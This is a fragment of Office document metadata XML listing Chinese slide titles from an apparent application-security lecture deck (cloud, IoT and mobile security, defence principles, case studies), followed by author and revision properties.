      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
      <vt:lpstr>第2.5节 物联网安全 </vt:lpstr>
      <vt:lpstr>第2.5节 物联网安全 </vt:lpstr>
      <vt:lpstr>第2.5节 物联网安全 </vt:lpstr>
      <vt:lpstr>第2.6节 移动应用安全 </vt:lpstr>
      <vt:lpstr>第2节 应用安全网络攻击的共性特征</vt:lpstr>
      <vt:lpstr>第3节 应用安全的基本防御原理 </vt:lpstr>
      <vt:lpstr>第3.1节 身份认证与访问控制 </vt:lpstr>
      <vt:lpstr>第3.2节 隐私保护 </vt:lpstr>
      <vt:lpstr>第3.3节 应用安全监控防御 </vt:lpstr>
      <vt:lpstr>第4节 典型案例分析</vt:lpstr>
      <vt:lpstr>第4.1节 Web安全的机密性</vt:lpstr>
      <vt:lpstr>第4.1节 Web安全的机密性</vt:lpstr>
      <vt:lpstr>第4.1节 Web安全的机密性</vt:lpstr>
      <vt:lpstr>第4.1节 Web安全的机密性</vt:lpstr>
      <vt:lpstr>第4.2 节 社交网络安全的机密性 </vt:lpstr>
      <vt:lpstr>第4.2 节 社交网络安全的机密性 </vt:lpstr>
      <vt:lpstr>第4.2 节 社交网络安全的机密性 </vt:lpstr>
      <vt:lpstr>第4.2 节 社交网络安全的机密性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Du xinle</cp:lastModifiedBy>
  <cp:revision>198</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-30T11:20:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-11T12:58:27Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>